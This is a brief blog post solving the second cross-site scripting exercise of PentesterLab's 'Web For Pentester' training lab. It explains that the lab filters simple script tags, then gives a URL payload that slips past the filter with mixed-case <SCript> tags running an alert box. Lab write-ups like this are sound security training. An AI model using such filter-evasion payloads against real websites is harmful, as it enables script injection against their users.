Friday 17 May 2013

PentesterLab - Web For Pentester - XSS Example 2


In the second example, a bit of filtering is involved. The web developer added some
regular expression to prevent the simple XSS payload to work.

Payload
http://192.168.56.101/xss/example2.php?name=Bobby<SCript>alert('Dazzler')</SCript>


No comments:

Post a Comment